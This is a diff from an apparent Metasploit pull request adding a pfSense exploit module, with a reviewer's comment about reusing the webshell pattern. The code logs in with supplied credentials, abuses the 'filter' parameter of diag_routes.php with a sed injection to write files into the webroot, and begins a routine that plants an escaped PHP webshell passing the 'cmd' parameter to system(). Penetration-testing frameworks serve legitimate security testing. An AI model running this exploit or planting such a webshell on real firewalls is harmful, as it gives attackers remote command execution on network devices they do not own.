modules/exploits/unix/http/pfsense_diag_routes_webshell.rb

```diff
@@ -0,0 +1,227 @@
+  # dashboard (where other pfsense modules extract the version).
+  def check
+    # Grab a CSRF token so that we can log in
+    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/index.php'))
+    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
+    return CheckCode::Unknown("Unexpected HTTP response from index.php: #{res.code}") unless res.code == 200
+    return CheckCode::Unknown('Could not find pfSense title html tag') unless res.body.include?('<title>pfSense - Login')
+
+    /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+    return CheckCode::Unknown('Could not find CSRF token') unless csrf
+
+    # send the log in attempt
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        '__csrf_magic' => csrf,
+        'usernamefld' => datastore['USERNAME'],
+        'passwordfld' => datastore['PASSWORD'],
+        'login' => ''
+      }
+    )
+
+    return CheckCode::Detected('No response to log in attempt.') unless res
+    return CheckCode::Detected('Log in failed. User provided invalid credentials.') unless res.code == 302
+
+    # save the auth cookie for later user
+    @auth_cookies = res.get_cookies
+
+    # attempt the exploit. Upload a random file to /usr/local/www/ with random contents
+    filename = Rex::Text.rand_text_alpha(4..12)
+    contents = Rex::Text.rand_text_alpha(16..32)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/diag_routes.php'),
+      'cookie' => @auth_cookies,
+      'encode_params' => false,
+      'vars_get' => {
+        'isAjax' => '1',
+        'filter' => ".*/!d;};s/Destination/#{contents}/;w+#{@webshell_path}#{filename}%0a%23"
+      }
+    })
+
+    return CheckCode::Safe('No response to upload attempt.') unless res
+    return CheckCode::Safe("Exploit attempt did not receive 200 OK: #{res.code}") unless res.code == 200
+
+    # Validate the exploit was successful by requesting the uploaded file
+    res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "/#{filename}"), 'cookie' => @auth_cookies })
+    return CheckCode::Safe('No response to exploit validation check.') unless res
+    return CheckCode::Safe("Exploit validation check did not receive 200 OK: #{res.code}") unless res.code == 200
+
+    register_file_for_cleanup("#{@webshell_path}#{filename}")
+    CheckCode::Vulnerable()
+  end
+
+  # Using the path traversal, upload a php webshell to the remote target
+  def drop_webshell
+    webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}")
+    print_status("Uploading webshell to #{webshell_location}")
+
+    # php_webshell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
+    php_shell = '\\x3c\\x3fphp+if($_GET[\\x22cmd\\x22])+\\x7b+system($_GET[\\x22cmd\\x22])\\x3b+\\x7d+\\x3f\\x3e'
```

Comment:
We may want to consider something in the future to make this pattern of using a PHP webshell more reusable. Not something we need to handle in this PR but the pattern of dropping a webshell seems to be coming up more often.